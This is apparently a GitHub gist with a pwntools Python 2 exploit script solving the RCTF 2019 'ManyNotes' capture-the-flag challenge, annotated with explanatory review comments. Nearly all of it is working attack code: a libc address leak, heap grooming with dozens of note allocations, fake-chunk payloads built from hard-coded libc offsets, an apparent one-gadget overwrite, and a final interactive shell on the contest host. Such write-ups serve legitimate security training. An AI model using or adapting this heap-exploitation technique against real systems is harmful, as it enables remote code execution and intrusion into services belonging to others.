@hama7230
Created May 20, 2019 05:14
RCTF 2019 ManyNotes
#!/usr/bin/env python
from pwn import *
# gdb windows open in a horizontal tmux split; the commented variant opens a
# new tmux window instead.
context(terminal=['tmux', 'splitw', '-h'])
# context(terminal=['tmux', 'new-window'])

# The challenge binary.  No libc ELF is loaded by this script: every libc
# offset used later is a hard-coded constant.
# libc = ELF('./libc.so.6')
elf = ELF('./many_notes')
context(os='linux', arch=elf.arch)
# context(log_level='debug')  # uncomment for verbose pwntools output

# Endpoints chosen by the command-line option: the contest host ('r') and a
# service on the loopback interface ('l').
RHOST, RPORT = "123.206.174.203", 20003
LHOST, LPORT = "127.0.0.1", 20003
def section_addr(name, elf=elf):
    """Return the load address (``sh_addr``) of ELF section *name*.

    Args:
        name: section name as it appears in the section header table.
        elf: pwntools ``ELF`` to look in; defaults to the challenge binary
            loaded at module level.
    """
    section = elf.get_section_by_name(name)
    return section.header['sh_addr']
def dbg(ss):
    """Log the value of the module-level name *ss* in hex.

    *ss* is a variable name given as a string (e.g. ``'libc_base'``).  It is
    resolved with ``eval()`` in this function's scope, so only names visible
    at module level (or ``ss`` itself) can be looked up.  This helper is
    meant for literal names written in this script, never for strings that
    come from outside it.
    """
    value = eval(ss)  # deliberate: the argument is a literal name from this file
    log.info("%s: 0x%x" % (ss, value))
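conn = None
# First CLI argument selects the target and is popped from argv:
#   'r' -> remote contest host, 'l' -> service on LHOST:LPORT,
#   'd' -> binary started under gdb, 'a' -> local process with gdb attached,
#   anything else (or no argument) -> plain local process.
opt = sys.argv.pop(1) if len(sys.argv) > 1 else '?'
# Membership is tested against a tuple, not the string 'rl': with
# `opt in 'rl'` both '' and 'rl' pass the test and then raise KeyError on
# the endpoint lookup below.
if opt in ('r', 'l'):
    endpoints = {'r': (RHOST, RPORT), 'l': (LHOST, LPORT)}
    conn = remote(*endpoints[opt])
elif opt == 'd':
    # The template contains no '{}' placeholder, so the address handed to
    # format() is never inserted; gdb just continues at startup.
    gdbscript = """
continue
""".format(hex(elf.symbols['main'] if 'main' in elf.symbols.keys() else elf.entrypoint))
    conn = gdb.debug(['./many_notes'], gdbscript=gdbscript)
else:
    # LD_LIBRARY_PATH='./' makes the local process load the libc placed in
    # the working directory (presumably the contest libc, so that the
    # hard-coded offsets below match — TODO confirm).
    conn = process(['./many_notes'], env={'LD_LIBRARY_PATH': './'})
    if opt == 'a':
        gdb.attach(conn)

# exploit
log.info('Pwning')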
def add(size, pad, ip, p):
    """Drive menu choice '0' of the target (presumably "add a note").

    Args:
        size: value sent in reply to the 'Size' prompt.
        pad: value sent in reply to the 'Padding' prompt.
        ip: truthy to answer '1' to 'Input? (0/1):' and then send *p* as the
            content; falsy to answer '0' and send nothing further.
        p: content bytes, sent raw (no trailing newline) after the 'Content'
            prompt when *ip* is truthy; ignored otherwise.
    """
    conn.sendlineafter('Choice:', '0')
    conn.sendlineafter('Size', str(size))
    conn.sendlineafter('Padding', str(pad))
    wants_input = '1' if ip else '0'
    conn.sendlineafter('Input? (0/1):', wants_input)
    if ip:
        conn.sendafter('Content', p)
# --- leak ---------------------------------------------------------------
# NOTE(review): indentation was lost in this paste; these two lines are
# taken to be module-level (not part of add()), since the 6 bytes read right
# after the echo are interpreted as a libc pointer.
# Eight 'x' bytes are sent, the program echoes them back, and whatever
# follows the echo is read as a 6-byte pointer zero-extended to 8 bytes.
conn.send('x'*0x8)
conn.recvuntil('x'*0x8)
# 0x3ab720 is presumably the offset of the leaked pointer inside the contest
# libc (no libc ELF is loaded here) — libc_base is only valid for that build.
libc_base = u64(conn.recv(6) + '\x00'*2) - 0x3ab720
dbg('libc_base')
# Python 2 print statement.  The mask clears the low 27 bits of libc_base;
# this 0x8000000-aligned value is the base the payloads below are built on.
print hex(libc_base & 0xfffffffff8000000)

# --- note allocations -------------------------------------------------------
# Large (0x2000) notes with no content, differing only in padding.
# NOTE(review): indentation lost in the paste; both lines under the `for`
# are assumed to be its body (22 iterations of the same allocation).
add(0x2000, 0x0, False, '')
for i in range(0x16):
    print i
    add(0x2000, 0x400, False, '')
add(0x2000, 0x3ff, False, '')
add(0x2000, 0x3b6, False, '')
add(0x1f00, 0, False, '')
add(0x100, 0x4, False, '')

# --- first content payload ---------------------------------------------------
# Five 32-byte records, each laid out as: qword 0, qword 0x75, a pointer,
# qword 0.  The first four pointers are fixed offsets (0xbfffe50 - 0x10000000,
# etc.) from the masked libc base; the last one is libc_base + 0x3dabed.
# NOTE(review): the meaning of 0x75 and of these addresses depends on the
# challenge's note layout and the contest libc — not verifiable from here.
payload = p64(0) + p64(0x75)
payload += p64(0xbfffe50 - 0x10000000 + (libc_base & 0xfffffffff8000000)) + p64(0)
payload += p64(0) + p64(0x75)
payload += p64(0xbfffe70 - 0x10000000 + (libc_base & 0xfffffffff8000000)) + p64(0)
payload += p64(0) + p64(0x75)
payload += p64(0xbfffe90 - 0x10000000 + (libc_base & 0xfffffffff8000000)) + p64(0)
payload += p64(0) + p64(0x75)
payload += p64(0xbfffea0 - 0x10000000 + (libc_base & 0xfffffffff8000000)) + p64(0)
payload += p64(0) + p64(0x75)
payload += p64(libc_base+0x3dabed) + p64(0)
# 0xa0 bytes of records, padded with 'w' up to 0x130, stored in a 0x140 note.
add(0x140, 0, True, payload.ljust(0x130, 'w'))

# --- second payload, sent raw rather than through add() ----------------------
payload = 'w'*0xa0
payload += p64((libc_base & 0xfffffffff8000000)+0x20) + p64(0)
payload += p64(0x0000000003fff000) * 2
payload += p64(0x0000000300000000) + p64(0)
payload += '\x00'*0x20 + p64( 0xbfffe30 - 0x10000000 + (libc_base & 0xfffffffff8000000))
# 1 ms pause before the raw send — presumably so the program has reached the
# read this payload answers; TODO confirm which prompt that is.
time.sleep(0.001)
# Python 2 print statement; the payload assembled above is 0xf8 bytes long.
print hex(len(payload))
conn.send(payload)

# --- final notes -------------------------------------------------------------
# 0x40 bytes (three NULs, two 0xdead qwords, 'a' padding) followed by
# libc_base + 0x3aac10 and three zero qwords, stored in a 0x60 note.
payload = '\x00'*3 + p64(0xdead) * 2
payload = payload.ljust(0x40, 'a') + p64(libc_base + 0x3aac10) + p64(0) *3
add(0x60, 0, True, payload)
add(0x68, 2, False, '')
# Last note: libc_base + 0xdea81, NUL-padded to 0x68 bytes.
# NOTE(review): 0x3aac10 and 0xdea81 are libc-relative offsets specific to
# the contest libc; what they point at is not recoverable from this script.
add(0x68, 0, True, p64(libc_base + 0xdea81).ljust(0x68,'\x00'))
# Hand the connection over to the user once the sequence above has run.
conn.interactive()